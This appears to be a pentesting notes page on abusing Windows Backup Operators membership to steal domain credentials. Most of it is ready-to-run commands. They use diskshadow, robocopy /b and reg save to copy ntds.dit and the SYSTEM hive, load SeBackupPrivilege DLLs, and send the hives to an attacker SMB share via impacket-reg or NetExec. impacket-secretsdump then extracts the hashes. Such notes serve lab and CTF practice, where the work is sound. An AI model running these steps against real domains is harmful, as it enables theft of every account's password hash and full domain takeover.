Backup Operators

Information

Backup Operators (S-1-5-32-551) can back up and restore all files on a computer, including OS files, regardless of the permissions that protect those files. Because members of this group can replace files on DCs, they're considered service administrators.

Privilege

Description

SeBackupPrivilege

Create backups of any files, whilst not restoring their permissions, which equals to arbitrary read access.

SeRestorePrivilege

Overwrite legitimate executable files with versions that include malicious software used for privilege escalation.

Exploitation

Check SeBackup.

If the controlled user has the SeBackupPrivilege, it can dump SAM, SYSTEM, SECURITY and therefore the NTDS.dit on the target system.

Windows

DiskShadow

Create a diskshadow script from the attack host to expose the c: drive.

# Create a diskshadow script
$ cat diskshadow_script
set context persistent nowriters
add volume c: alias random
create
expose %random% z:

# Convert file into a Windows-compatible format
$ flip -m diskshadow_script
$ sudo unix2dos diskshadow_script # deprecated

Transfer the script to the target host and execute the following steps.

# Move within a writeable directory
cd c:\windows\temp

# Upload the diskshadow script
upload diskshadow_script

# Expose the shadow copy
diskshadow /s diskshadow_script

# Copy the ntds.dit database
robocopy /b z:\windows\ntds . ntds.dit

# Copy the system.hive file
reg save hklm\system c:\windows\temp\system.hive

Dump the ntds.dit on the attack host:

impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL | grep Administrator

For an example of the above method, see Blackfield.

DLLs

Download the SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll on the attack host and transfer them to the target along with the disk_shadow script found above. Behind the scenes, the Copy-FileSebackupPrivilege cmdlet (part of the DLL files) is used to copy the ntds.dit file from the z: volume to the Temp directory.

# Move to a writeable directory
cd C:\Temp

# Upload files
upload diskshadow_script
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

# Import DLLs into memory
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

# Expose the shadow copy
diskshadow /s raj.dsh

# Copy ntds.dit to Temp
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit

# Copy system.hive
reg save hklm\system c:\Temp\system

Dump the ntds.dit from the attack host:

impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL

Linux

This membership can be leveraged from Linux using NetExec or reg.py.

# NetExec
nxc smb 10.10.10.4 -u x7331 -p Password123! -M backup_operator

#----------#
# Impacket #
#----------#

# Start an SMB share
sudo impacket-smbserver -smb2support share .

# Extract SAM and SYSTEM
impacket-reg marvel.local/x7331:'Password123!'@10.10.205.11 backup -o '\\10.10.14.33\share'

# Dump SAM or ntds.dit
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL

PreviousAccount Operators NextCert Publishers

Last updated 24 days ago

hashtagInformation

hashtagExploitation

hashtagWindows

hashtagDiskShadow

hashtagDLLs

hashtagLinux